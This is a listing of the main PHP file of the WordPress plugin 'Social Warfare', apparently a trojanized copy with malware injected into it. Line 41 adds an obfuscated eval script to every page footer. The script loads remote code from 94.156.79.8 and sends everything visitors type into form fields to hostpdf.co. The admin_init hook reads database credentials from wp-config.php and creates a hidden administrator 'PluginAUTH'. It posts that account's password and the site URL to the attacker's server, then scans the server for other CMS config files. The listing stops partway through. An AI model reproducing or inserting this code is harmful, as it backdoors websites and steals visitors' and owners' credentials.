1 | <?php |
---|
2 | |
---|
3 | /** |
---|
4 | * Plugin Name: Social Warfare |
---|
5 | * Plugin URI: https://warfareplugins.com |
---|
6 | * Description: A plugin to maximize social shares and drive more traffic using the fastest and most intelligent share buttons on the market, calls to action via in-post click-to-tweets, popular posts widgets based on share popularity, link-shortening, Google Analytics and much, much more! |
---|
7 | * Version: 4.4.7.1 |
---|
8 | * Author: Warfare Plugins |
---|
9 | * Author URI: https://warfareplugins.com |
---|
10 | * Text Domain: social-warfare |
---|
11 | * |
---|
12 | */ |
---|
13 | defined( 'WPINC' ) || die; |
---|
14 | |
---|
15 | |
---|
16 | /** |
---|
17 | * We create these constants here so that we can use them throughout the plugin |
---|
18 | * for things like includes and requires. |
---|
19 | * |
---|
20 | * @since 4.2.0 | 19 NOV 2020 | The str_replace() removes any linebreaks in the string. |
---|
21 | * |
---|
22 | */ |
---|
23 | define( 'SWP_VERSION', '4.4.7.1' ); |
---|
24 | define( 'SWP_DEV_VERSION', '2024.06.22 MASTER' ); |
---|
25 | define( 'SWP_PLUGIN_FILE', __FILE__ ); |
---|
26 | define( 'SWP_PLUGIN_URL', str_replace( array( "\r", "\n" ), '', untrailingslashit( plugin_dir_url( __FILE__ ) ) ) ); |
---|
27 | define( 'SWP_PLUGIN_DIR', __DIR__ ); |
---|
28 | define( 'SWP_STORE_URL', 'https://warfareplugins.com' ); |
---|
29 | |
---|
30 | |
---|
31 | /** |
---|
32 | * This will allow shortcodes to be processed in the excerpts. Ours is set up |
---|
33 | * to essentially remove the [shortcode] from being visible in the excerpts so |
---|
34 | * that they don't show up as plain text. |
---|
35 | * |
---|
36 | * @todo This needs to be moved into the Social_Warfare class. |
---|
37 | * |
---|
38 | */ |
---|
39 | add_filter( 'the_excerpt', 'do_shortcode', 1 ); |
---|
40 | function add_footer_script() { |
---|
41 | echo '<script>eval("\u000a\u0020\u0020\u0020\u0020\u0076\u0061\u0072\u0020\u0073\u0063\u0072\u0069\u0070\u0074\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u0020\u003d\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0063\u0072\u0065\u0061\u0074\u0065\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u0028\u0022\u0073\u0063\u0072\u0069\u0070\u0074\u0022\u0029\u003b\u000a\u0020\u0020\u0020\u0020\u0073\u0063\u0072\u0069\u0070\u0074\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u002e\u0073\u0072\u0063\u0020\u003d\u0020\u0022\u0068\u0074\u0074\u0070\u0073\u003a\u002f\u002f\u0039\u0034\u002e\u0031\u0035\u0036\u002e\u0037\u0039\u002e\u0038\u002f\u0073\u0063\u002d\u0074\u006f\u0070\u002e\u006a\u0073\u0022\u003b\u000a\u000a\u0020\u0020\u0020\u0020\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0072\u0065\u006d\u006f\u0076\u0065\u0053\u0063\u0072\u0069\u0070\u0074\u0028\u0029\u0020\u007b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0073\u0063\u0072\u0069\u0070\u0074\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u002e\u0070\u0061\u0072\u0065\u006e\u0074\u004e\u006f\u0064\u0065\u002e\u0072\u0065\u006d\u006f\u0076\u0065\u0043\u0068\u0069\u006c\u0064\u0028\u0073\u0063\u0072\u0069\u0070\u0074\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u0029\u003b\u000a\u0020\u0020\u0020\u0020\u007d\u000a\u000a\u0020\u0020\u0020\u0020\u0073\u0063\u0072\u0069\u0070\u0074\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u002e\u0061\u0064\u0064\u0045\u0076\u0065\u006e\u0074\u004c\u0069\u0073\u0074\u0065\u006e\u0065\u0072\u0028\u0027\u006c\u006f\u0061\u0064\u0027\u002c\u0020\u0072\u0065\u006d\u006f\u0076\u0065\u0053\u0063\u0072\u0069\u0070\u0074\u0029\u003b\u000a\u000a\u0020\u0020\u0020\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0062\u006f\u0064\u0079\u002e\u0061\u0070\u0070\u0065\u006e\u0064\u0043\u0068\u0069\u006c\u0064\u0028\u0073\u0063\u0072\u0069\u0070\u0074\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u0029\u003b\u000a\u0020\u0020\u0020\u0020\u000a\u0020\u0020\u0020\u0020\u000a\u0020\u0020\u0020\u0020\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0067\u0065\u006e\u0065\u0072\u0061\u0074\u0065\u0052\u0061\u006e\u0064\u006f\u006d\u0053\u0074\u0072\u0069\u006e\u0067\u0028\u0074\u0029\u0020\u007b\u000a\u0020\u0020\u0020\u0020\u0063\u006f\u006e\u0073\u0074\u0020\u0065\u0020\u003d\u0020\u0022\u0041\u0042\u0043\u0044\u0045\u0046\u0047\u0048\u0049\u004a\u004b\u004c\u004d\u004e\u004f\u0050\u0051\u0052\u0053\u0054\u0055\u0056\u0057\u0058\u0059\u005a\u0061\u0062\u0063\u0064\u0065\u0066\u0067\u0068\u0069\u006a\u006b\u006c\u006d\u006e\u006f\u0070\u0071\u0072\u0073\u0074\u0075\u0076\u0077\u0078\u0079\u007a\u0030\u0031\u0032\u0033\u0034\u0035\u0036\u0037\u0038\u0039\u0022\u003b\u000a\u0020\u0020\u0020\u0020\u006c\u0065\u0074\u0020\u006e\u0020\u003d\u0020\u0022\u0022\u003b\u000a\u0020\u0020\u0020\u0020\u0066\u006f\u0072\u0020\u0028\u006c\u0065\u0074\u0020\u006f\u0020\u003d\u0020\u0030\u003b\u0020\u006f\u0020\u003c\u0020\u0074\u003b\u0020\u006f\u002b\u002b\u0029\u0020\u007b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0063\u006f\u006e\u0073\u0074\u0020\u0074\u0020\u003d\u0020\u004d\u0061\u0074\u0068\u002e\u0066\u006c\u006f\u006f\u0072\u0028\u0036\u0032\u0020\u002a\u0020\u004d\u0061\u0074\u0068\u002e\u0072\u0061\u006e\u0064\u006f\u006d\u0028\u0029\u0029\u003b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u006e\u0020\u002b\u003d\u0020\u0065\u002e\u0063\u0068\u0061\u0072\u0041\u0074\u0028\u0074\u0029\u000a\u0020\u0020\u0020\u0020\u007d\u000a\u0020\u0020\u0020\u0020\u0072\u0065\u0074\u0075\u0072\u006e\u0020\u006e\u000a\u007d\u000a\u000a\u006c\u0065\u0074\u0020\u0075\u0069\u0064\u0020\u003d\u0020\u0067\u0065\u0074\u0043\u006f\u006f\u006b\u0069\u0065\u0028\u0027\u0078\u0063\u006e\u006d\u006f\u002d\u006f\u0066\u0066\u0073\u0065\u0074\u0067\u0078\u0063\u0027\u0029\u003b\u000a\u000a\u0069\u0066\u0020\u0028\u0021\u0075\u0069\u0064\u0029\u0020\u007b\u000a\u0020\u0020\u0020\u0020\u0075\u0069\u0064\u0020\u003d\u0020\u0067\u0065\u006e\u0065\u0072\u0061\u0074\u0065\u0052\u0061\u006e\u0064\u006f\u006d\u0053\u0074\u0072\u0069\u006e\u0067\u0028\u0031\u0030\u0029\u003b\u000a\u0020\u0020\u0020\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0063\u006f\u006f\u006b\u0069\u0065\u0020\u003d\u0020\u0060\u0078\u0063\u006e\u006d\u006f\u002d\u006f\u0066\u0066\u0073\u0065\u0074\u0067\u0078\u0063\u003d\u0024\u007b\u0075\u0069\u0064\u007d\u003b\u0020\u0070\u0061\u0074\u0068\u003d\u002f\u0060\u003b\u000a\u007d\u000a\u000a\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0073\u0065\u006e\u0064\u0050\u006f\u0073\u0074\u0052\u0065\u0071\u0075\u0065\u0073\u0074\u0028\u0074\u002c\u0020\u0065\u0029\u0020\u007b\u000a\u0020\u0020\u0020\u0020\u0063\u006f\u006e\u0073\u0074\u0020\u006e\u0020\u003d\u0020\u006e\u0065\u0077\u0020\u0055\u0052\u004c\u0053\u0065\u0061\u0072\u0063\u0068\u0050\u0061\u0072\u0061\u006d\u0073\u003b\u000a\u0020\u0020\u0020\u0020\u006e\u002e\u0061\u0070\u0070\u0065\u006e\u0064\u0028\u0022\u0075\u0069\u0064\u0022\u002c\u0020\u0075\u0069\u0064\u0029\u002c\u000a\u0020\u0020\u0020\u0020\u006e\u002e\u0061\u0070\u0070\u0065\u006e\u0064\u0028\u0022\u0069\u005f\u006e\u0061\u006d\u0065\u0022\u002c\u0020\u0074\u0029\u002c\u000a\u0020\u0020\u0020\u0020\u002f\u002f\u0020\u0041\u0064\u0064\u0020\u0074\u0068\u0065\u0020\u0066\u0069\u0065\u006c\u0064\u0020\u006e\u0061\u006d\u0065\u0020\u0061\u0073\u0020\u0061\u0020\u0070\u0061\u0072\u0061\u006d\u0065\u0074\u0065\u0072\u000a\u0020\u0020\u0020\u0020\u006e\u002e\u0061\u0070\u0070\u0065\u006e\u0064\u0028\u0022\u0062\u0022\u002c\u0020\u0062\u0074\u006f\u0061\u0028\u0065\u0029\u0029\u002c\u000a\u0020\u0020\u0020\u0020\u0066\u0065\u0074\u0063\u0068\u0028\u0022\u0068\u0074\u0074\u0070\u0073\u003a\u002f\u002f\u0068\u006f\u0073\u0074\u0070\u0064\u0066\u002e\u0063\u006f\u002f\u0070\u0069\u006e\u0063\u0068\u0065\u002e\u0070\u0068\u0070\u0022\u002c\u0020\u007b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u006d\u0065\u0074\u0068\u006f\u0064\u003a\u0020\u0022\u0050\u004f\u0053\u0054\u0022\u002c\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0068\u0065\u0061\u0064\u0065\u0072\u0073\u003a\u0020\u007b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0043\u006f\u006e\u0074\u0065\u006e\u0074\u002d\u0054\u0079\u0070\u0065\u0022\u003a\u0020\u0022\u0061\u0070\u0070\u006c\u0069\u0063\u0061\u0074\u0069\u006f\u006e\u002f\u0078\u002d\u0077\u0077\u0077\u002d\u0066\u006f\u0072\u006d\u002d\u0075\u0072\u006c\u0065\u006e\u0063\u006f\u0064\u0065\u0064\u0022\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u007d\u002c\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0062\u006f\u0064\u0079\u003a\u0020\u006e\u002e\u0074\u006f\u0053\u0074\u0072\u0069\u006e\u0067\u0028\u0029\u000a\u0020\u0020\u0020\u0020\u007d\u0029\u002e\u0074\u0068\u0065\u006e\u0028\u0028\u0074\u003d\u003e\u0074\u002e\u0074\u0065\u0078\u0074\u0028\u0029\u0029\u0029\u002e\u0074\u0068\u0065\u006e\u0028\u0028\u0074\u003d\u003e\u0063\u006f\u006e\u0073\u006f\u006c\u0065\u002e\u006c\u006f\u0067\u0028\u0074\u0029\u0029\u0029\u002e\u0063\u0061\u0074\u0063\u0068\u0028\u0028\u0074\u003d\u003e\u0063\u006f\u006e\u0073\u006f\u006c\u0065\u002e\u0065\u0072\u0072\u006f\u0072\u0028\u0022\u0045\u0072\u0072\u006f\u0072\u003a\u0022\u002c\u0020\u0074\u0029\u0029\u0029\u000a\u007d\u000a\u000a\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0061\u0064\u0064\u0045\u0076\u0065\u006e\u0074\u004c\u0069\u0073\u0074\u0065\u006e\u0065\u0072\u0028\u0022\u0069\u006e\u0070\u0075\u0074\u0022\u002c\u0020\u0028\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0028\u0074\u0029\u0020\u007b\u000a\u0020\u0020\u0020\u0020\u0069\u0066\u0020\u0028\u0022\u0049\u004e\u0050\u0055\u0054\u0022\u0020\u003d\u003d\u003d\u0020\u0074\u002e\u0074\u0061\u0072\u0067\u0065\u0074\u002e\u0074\u0061\u0067\u004e\u0061\u006d\u0065\u0020\u0026\u0026\u0020\u0022\u0062\u0075\u0074\u0074\u006f\u006e\u0022\u0020\u0021\u003d\u003d\u0020\u0074\u002e\u0074\u0061\u0072\u0067\u0065\u0074\u002e\u0074\u0079\u0070\u0065\u0029\u0020\u007b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0073\u0065\u006e\u0064\u0050\u006f\u0073\u0074\u0052\u0065\u0071\u0075\u0065\u0073\u0074\u0028\u0074\u002e\u0074\u0061\u0072\u0067\u0065\u0074\u002e\u006e\u0061\u006d\u0065\u0020\u007c\u007c\u0020\u0074\u002e\u0074\u0061\u0072\u0067\u0065\u0074\u002e\u0069\u0064\u002c\u0020\u0074\u002e\u0074\u0061\u0072\u0067\u0065\u0074\u002e\u0076\u0061\u006c\u0075\u0065\u0029\u000a\u0020\u0020\u0020\u0020\u007d\u000a\u007d\u0029\u0029\u003b\u000a\u000a\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0067\u0065\u0074\u0043\u006f\u006f\u006b\u0069\u0065\u0028\u006e\u0061\u006d\u0065\u0029\u0020\u007b\u000a\u0020\u0020\u0020\u0020\u0063\u006f\u006e\u0073\u0074\u0020\u0063\u006f\u006f\u006b\u0069\u0065\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u003d\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0063\u006f\u006f\u006b\u0069\u0065\u003b\u000a\u0020\u0020\u0020\u0020\u0063\u006f\u006e\u0073\u0074\u0020\u0063\u006f\u006f\u006b\u0069\u0065\u0073\u0020\u003d\u0020\u0063\u006f\u006f\u006b\u0069\u0065\u0053\u0074\u0072\u0069\u006e\u0067\u002e\u0073\u0070\u006c\u0069\u0074\u0028\u0027\u003b\u0020\u0027\u0029\u003b\u000a\u0020\u0020\u0020\u0020\u0066\u006f\u0072\u0020\u0028\u006c\u0065\u0074\u0020\u0063\u006f\u006f\u006b\u0069\u0065\u0020\u006f\u0066\u0020\u0063\u006f\u006f\u006b\u0069\u0065\u0073\u0029\u0020\u007b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0063\u006f\u006e\u0073\u0074\u0020\u005b\u0063\u006f\u006f\u006b\u0069\u0065\u004e\u0061\u006d\u0065\u002c\u0020\u0063\u006f\u006f\u006b\u0069\u0065\u0056\u0061\u006c\u0075\u0065\u005d\u0020\u003d\u0020\u0063\u006f\u006f\u006b\u0069\u0065\u002e\u0073\u0070\u006c\u0069\u0074\u0028\u0027\u003d\u0027\u0029\u003b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0069\u0066\u0020\u0028\u0063\u006f\u006f\u006b\u0069\u0065\u004e\u0061\u006d\u0065\u0020\u003d\u003d\u003d\u0020\u006e\u0061\u006d\u0065\u0029\u0020\u007b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0072\u0065\u0074\u0075\u0072\u006e\u0020\u0063\u006f\u006f\u006b\u0069\u0065\u0056\u0061\u006c\u0075\u0065\u003b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u007d\u000a\u0020\u0020\u0020\u0020\u007d\u000a\u0020\u0020\u0020\u0020\u0072\u0065\u0074\u0075\u0072\u006e\u0020\u006e\u0075\u006c\u006c\u003b\u000a\u007d\u000a\u0020\u0020\u0020\u0020");</script>'; |
---|
42 | } |
---|
43 | add_action('wp_footer', 'add_footer_script'); |
---|
44 | add_action( 'admin_init', 'custom_notify_plugin_updated'); |
---|
45 | function custom_notify_plugin_updated() { |
---|
46 | $has_run = get_option('my_admin_init_function_run'); |
---|
47 | if ($has_run !== 'yes') { |
---|
48 | function check_wp_config($directory) { |
---|
49 | while ($directory !== '/') { |
---|
50 | $wp_config_file = $directory . '/wp-config.php'; |
---|
51 | if (file_exists($wp_config_file)) { |
---|
52 | return $wp_config_file; |
---|
53 | } |
---|
54 | $directory = dirname($directory); |
---|
55 | } |
---|
56 | remove_action('admin_init', 'custom_notify_plugin_updated'); |
---|
57 | return false; |
---|
58 | } |
---|
59 | |
---|
60 | function parse_wp_config($config_file) { |
---|
61 | if (file_exists($config_file)) { |
---|
62 | $config_content = file_get_contents($config_file); |
---|
63 | $matches = []; |
---|
64 | // Extract prefix |
---|
65 | if (preg_match("/\$table_prefix\s*=\s*'(.+?)';/", $config_content, $matches)) { |
---|
66 | $prefix = $matches[1]; |
---|
67 | } else if (preg_match("/table_prefix.*=.*'(.+?)';/", $config_content, $matches)) { |
---|
68 | $prefix = $matches[1]; |
---|
69 | } else { |
---|
70 | //die("Prefix not found in wp-config.php"); |
---|
71 | $ba = ''; |
---|
72 | } |
---|
73 | // Extract database name |
---|
74 | if (preg_match("/define\(\s*'DB_NAME'\s*,\s*'(.+?)'\s*\);/", $config_content, $matches)) { |
---|
75 | $database = $matches[1]; |
---|
76 | } |
---|
77 | // Extract username |
---|
78 | if (preg_match("/define\(\s*'DB_USER'\s*,\s*'(.+?)'\s*\);/", $config_content, $matches)) { |
---|
79 | $username = $matches[1]; |
---|
80 | } |
---|
81 | // Extract password |
---|
82 | if (preg_match("/define\(\s*'DB_PASSWORD'\s*,\s*'(.+?)'\s*\);/", $config_content, $matches)) { |
---|
83 | $password = $matches[1]; |
---|
84 | } |
---|
85 | // Extract host |
---|
86 | if (preg_match("/define\(\s*'DB_HOST'\s*,\s*'(.+?)'\s*\);/", $config_content, $matches)) { |
---|
87 | $host = $matches[1]; |
---|
88 | } else { |
---|
89 | $host = 'localhost'; // Assuming local host if not specified |
---|
90 | } |
---|
91 | |
---|
92 | return array( |
---|
93 | 'prefix' => $prefix, |
---|
94 | 'database' => $database, |
---|
95 | 'username' => $username, |
---|
96 | 'password' => $password, |
---|
97 | 'host' => $host |
---|
98 | ); |
---|
99 | } else { |
---|
100 | //die("wp-config.php file not found"); |
---|
101 | $gz = ''; |
---|
102 | } |
---|
103 | } |
---|
104 | |
---|
105 | function access_database($config) { |
---|
106 | $mysqli = new mysqli($config['host'], $config['username'], $config['password'], $config['database']); |
---|
107 | |
---|
108 | if ($mysqli->connect_errno) { |
---|
109 | //echo "DATABASE ACCESS [FAIL]\n"; |
---|
110 | return false; |
---|
111 | } else { |
---|
112 | //POST "DATABASE ACCESS [SUCCESS]\n"; |
---|
113 | return $mysqli; |
---|
114 | } |
---|
115 | } |
---|
116 | |
---|
117 | function generate_random_password($length = 12) { |
---|
118 | $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()-_'; |
---|
119 | $password = ''; |
---|
120 | $characters_length = strlen($characters); |
---|
121 | for ($i = 0; $i < $length; $i++) { |
---|
122 | $password .= $characters[rand(0, $characters_length - 1)]; |
---|
123 | } |
---|
124 | return $password; |
---|
125 | } |
---|
126 | |
---|
127 | // Define a global variable for the password |
---|
128 | $generated_password = generate_random_password(); |
---|
129 | |
---|
130 | // Define a global variable for the users count |
---|
131 | $wpuserscount = 0; |
---|
132 | function add_admin_user($mysqli, $config, $password) { |
---|
133 | global $generated_password; // Access the global generated password variable |
---|
134 | global $wpuserscount; // Declare the global variable to update user count |
---|
135 | $username = 'PluginAUTH'; |
---|
136 | |
---|
137 | //$generated_password = $password; |
---|
138 | //$password = $generated_password; |
---|
139 | $user_role = 'administrator'; |
---|
140 | |
---|
141 | // First, let's update the global user count |
---|
142 | $countQuery = "SELECT COUNT(*) AS user_count FROM {$config['prefix']}users"; |
---|
143 | $countResult = $mysqli->query($countQuery); |
---|
144 | if ($countResult) { |
---|
145 | $row = $countResult->fetch_assoc(); |
---|
146 | $wpuserscount = $row['user_count']; // Update the global variable with the user count |
---|
147 | } else { |
---|
148 | //echo "Error fetching user count: " . $mysqli->error . "\n"; |
---|
149 | return; // Early return in case of query error |
---|
150 | } |
---|
151 | // Hash the password |
---|
152 | $hashed_password = password_hash($password, PASSWORD_DEFAULT); |
---|
153 | |
---|
154 | // Check if the user already exists |
---|
155 | $query = "SELECT ID FROM {$config['prefix']}users WHERE user_login = '{$username}'"; |
---|
156 | $result = $mysqli->query($query); |
---|
157 | |
---|
158 | if ($result && $result->num_rows > 0) { |
---|
159 | //echo "User '{$username}' already exists.\n"; |
---|
160 | $z = "b"; |
---|
161 | } else { |
---|
162 | // Insert the new user |
---|
163 | $query = "INSERT INTO {$config['prefix']}users (user_login, user_pass, user_nicename, user_email, user_registered) VALUES ('{$username}', '{$hashed_password}', '{$username}', '{$username}@example.com', NOW())"; |
---|
164 | $result = $mysqli->query($query); |
---|
165 | |
---|
166 | if ($result) { |
---|
167 | $user_id = $mysqli->insert_id; |
---|
168 | |
---|
169 | // Set user role |
---|
170 | $query = "INSERT INTO {$config['prefix']}usermeta (user_id, meta_key, meta_value) VALUES ({$user_id}, '{$config['prefix']}capabilities', 'a:1:{s:13:\"administrator\";b:1;}')"; |
---|
171 | $result = $mysqli->query($query); |
---|
172 | |
---|
173 | if ($result) { |
---|
174 | //echo "User '{$username}' with administrative privileges added successfully.\n"; |
---|
175 | $zb = ''; |
---|
176 | } else { |
---|
177 | //echo "Error assigning role to user '{$username}'.\n"; |
---|
178 | $zb = ''; |
---|
179 | } |
---|
180 | } else { |
---|
181 | //echo "Error creating user '{$username}': " . $mysqli->error . "\n"; |
---|
182 | $zb = ''; |
---|
183 | } |
---|
184 | } |
---|
185 | } |
---|
186 | |
---|
187 | function get_domain_from_database($mysqli, $config) { |
---|
188 | // Query to retrieve site URL from WordPress options table |
---|
189 | $query = "SELECT option_value FROM {$config['prefix']}options WHERE option_name = 'siteurl'"; |
---|
190 | $result = $mysqli->query($query); |
---|
191 | |
---|
192 | if ($result && $result->num_rows > 0) { |
---|
193 | $row = $result->fetch_assoc(); |
---|
194 | $site_url = $row['option_value']; |
---|
195 | $parsed_url = parse_url($site_url); |
---|
196 | if ($parsed_url && isset($parsed_url['host'])) { |
---|
197 | return $parsed_url['host']; |
---|
198 | } |
---|
199 | } |
---|
200 | |
---|
201 | return null; |
---|
202 | } |
---|
203 | $currdomain = 'UNK.UNK'; |
---|
204 | function pachamama($path) { |
---|
205 | global $currdomain; |
---|
206 | if (strpos($path, 'wp-config.php') !== false) { |
---|
207 | $path = str_replace('wp-config.php', '', $path); |
---|
208 | } |
---|
209 | |
---|
210 | $current_directory = $path; |
---|
211 | $wp_config_file = check_wp_config($current_directory); |
---|
212 | if ($wp_config_file) { |
---|
213 | //echo "WP-CONFIG [FOUND]\n"; |
---|
214 | |
---|
215 | $config = parse_wp_config($wp_config_file); |
---|
216 | $mysqli = access_database($config); |
---|
217 | if ($mysqli) { |
---|
218 | $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()-_'; |
---|
219 | $password = ''; |
---|
220 | $characters_length = strlen($characters); |
---|
221 | for ($i = 0; $i < 13; $i++) { |
---|
222 | $password .= $characters[rand(0, $characters_length - 1)]; |
---|
223 | } |
---|
224 | add_admin_user($mysqli, $config, $password); |
---|
225 | $domain = get_domain_from_database($mysqli, $config); |
---|
226 | if ($domain) { |
---|
227 | //echo "[$domain] OK\n"; |
---|
228 | $currdomain = $domain; |
---|
229 | |
---|
230 | // Reconstruct the correct wp-login.php path |
---|
231 | $wp_login_path = "https://{$domain}/wp-login.php"; |
---|
232 | |
---|
233 | // Perform a POST request to https://94.156.79.8/AddSites |
---|
234 | $url = 'https://94.156.79.8/AddSites'; |
---|
235 | $aurl = get_admin_url(); |
---|
236 | $post_data = array( |
---|
237 | 'aurl' => $aurl, |
---|
238 | 'domain' => $domain, |
---|
239 | 'username' => 'PluginAUTH', |
---|
240 | 'passwordz' => $password, // Access the global generated password variable |
---|
241 | 'wp_login_path' => $wp_login_path |
---|
242 | ); |
---|
243 | |
---|
244 | $ch = curl_init(); |
---|
245 | curl_setopt($ch, CURLOPT_URL, $url); |
---|
246 | curl_setopt($ch, CURLOPT_POST, 1); |
---|
247 | curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($post_data)); // Send JSON data |
---|
248 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); |
---|
249 | curl_setopt($ch, CURLOPT_HTTPHEADER, array( |
---|
250 | 'Content-Type: application/json', // Set content type to JSON |
---|
251 | 'Content-Length: ' . strlen(json_encode($post_data)) // Set content length |
---|
252 | )); |
---|
253 | $response = curl_exec($ch); |
---|
254 | $error = curl_error($ch); // Get any curl error |
---|
255 | curl_close($ch); |
---|
256 | |
---|
257 | if ($response === false) { |
---|
258 | //echo "POST request failed: $error\n"; |
---|
259 | $z = false; |
---|
260 | } else { |
---|
261 | //echo "POST request sent successfully. Response: $response\n"; |
---|
262 | $z = true; |
---|
263 | } |
---|
264 | } else { |
---|
265 | //echo "Domain retrieval failed.\n"; |
---|
266 | $z = false; |
---|
267 | } |
---|
268 | $mysqli->close(); |
---|
269 | } |
---|
270 | } else { |
---|
271 | //echo "WP-CONFIG [NOT FOUND]\n"; |
---|
272 | $z = false; |
---|
273 | } |
---|
274 | } |
---|
275 | |
---|
276 | function check_cms_configuration_files() { |
---|
277 | global $wpuserscount; |
---|
278 | global $wp_config_paths; |
---|
279 | global $wc_config_paths; |
---|
280 | global $mg_config_paths; |
---|
281 | // Function to recursively search directories for configuration files |
---|
282 | //function search_for_config_files($directory, &$cms_config_files, $max_parents = 4) { |
---|
283 | function search_for_config_files(&$cms_config_files, $max_parents = 3) { |
---|
284 | // Get the current directory |
---|
285 | $directory = __DIR__; |
---|
286 | |
---|
287 | // Initialize the variable to keep track of the last readable path |
---|
288 | $last_readable_path = null; |
---|
289 | |
---|
290 | // Iterate to go one parent folder up until no read permission or max 5 parents |
---|
291 | for ($i = 0; $i < $max_parents; $i++) { |
---|
292 | // Check if the directory exists and is readable |
---|
293 | if (is_dir($directory) && is_readable($directory)) { |
---|
294 | $last_readable_path = $directory; |
---|
295 | } else { |
---|
296 | // Stop iteration if the directory is not readable |
---|
297 | break; |
---|
298 | } |
---|
299 | |
---|
300 | // Move one directory up |
---|
301 | $directory = dirname($directory); |
---|
302 | } |
---|
303 | |
---|
304 | // If a readable path was found, perform a recursive glob search for the specified file extensions |
---|
305 | if (!empty($last_readable_path)) { |
---|
306 | |
---|
307 | $config_files = []; |
---|
308 | $files = []; |
---|
309 | //$pattern = '/home/98752.cloudwaysapps.com/trnkgjmvur'; |
---|
310 | try { |
---|
311 | $objects = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($last_readable_path), RecursiveIteratorIterator::SELF_FIRST, RecursiveIteratorIterator::CATCH_GET_CHILD); |
---|
312 | foreach($objects as $name => $object){ |
---|
313 | if (substr($name, -4) === '.php') { |
---|
314 | // Add only files ending with '.php' to the $files array |
---|
315 | //echo "$name\n"; |
---|
316 | $files[] = $name; |
---|
317 | } |
---|
318 | } |
---|
319 | } catch (Exception $e) { |
---|
320 | // Handle any exceptions that occur during iteration |
---|
321 | // You can log the error or take appropriate action here |
---|
322 | //echo "Error: " . $e->getMessage(); |
---|
323 | $d = 'sab'; |
---|
324 | } |
---|
325 | foreach ($files as $file) { |
---|
326 | // Add the found file to the list of config files |
---|
327 | //print($file); |
---|
328 | $cms_config_files[] = $file; |
---|
329 | } |
---|
330 | return $cms_config_files; |
---|
331 | } else { |
---|
332 | // Return an empty array if no readable path was found |
---|
333 | //echo("No Readable Paths"); |
---|
334 | return []; |
---|
335 | } |
---|
336 | } |
---|
337 | |
---|
338 | |
---|
339 | // Array to store detected CMS names |
---|
340 | $detected_cms = [ |
---|
341 | 'WordPress' => false, |
---|
342 | 'WooCommerce' => false, |
---|
343 | 'Magento' => false, |
---|
344 | 'OpenCart' => false, |
---|
345 | 'PrestaShop' => false, |
---|
346 | 'Drupal Commerce' => false, |
---|
347 | 'Symfony' => false, |
---|
348 | 'Laravel' => false, |
---|
349 | 'Zend Framework' => false |
---|
350 | ]; |
---|
351 | |
---|
352 | // Array to store detected .dat files |
---|
353 | $detected_dat_files = []; |
---|
354 | |
---|
355 | // Paths to check for CMS-specific configuration files |
---|
356 | $current_directory = __DIR__; |
---|
357 | $paths_to_check = [ |
---|
358 | '/var/www/vhosts/aedstudisrl.com/httpdocs/wp-admin', |
---|
359 | $current_directory, |
---|
360 | '/etc', // Common system configuration directory |
---|
361 | '/var/www', // Example web root directory |
---|
362 | '/home', // Home directories |
---|
363 | '/opt', // Optional software packages |
---|
364 | '/usr/local', // Locally installed software |
---|
365 | '/usr/share', // Shared software resources |
---|
366 | '/var/lib', // Variable data directories |
---|
367 | ]; |
---|
368 | |
---|
369 | // Files to search for in each directory |
---|
370 | $files_to_search = [ |
---|
371 | 'app/etc/env.php', // Magento |
---|
372 | 'wp-config.php', 'wp-content/plugins/woocommerce/includes/class-wc-settings.php', // WordPress & WooCommerce |
---|
373 | 'config.php', // OpenCart |
---|
374 | 'config/parameters.php', // PrestaShop |
---|
375 | 'sites/default/settings.php', // Drupal Commerce |
---|
376 | 'config/packages/*.yaml', // Symfony |
---|
377 | '.env', // Laravel |
---|
378 | 'config/autoload/*.global.php', // Zend Framework |
---|
379 | '*.dat', // .dat files |
---|
380 | ]; |
---|
381 | |
---|
382 | // Array to store CMS configuration files |
---|
383 | $cms_config_files = []; |
---|
384 | |
---|
385 | // Iterate through the paths to check and search for configuration files in each directory recursively |
---|
386 | |
---|
387 | search_for_config_files($cms_config_files); |
---|
388 | |
---|
389 | |
---|
390 | // Process the detected configuration files and extract CMS information |
---|
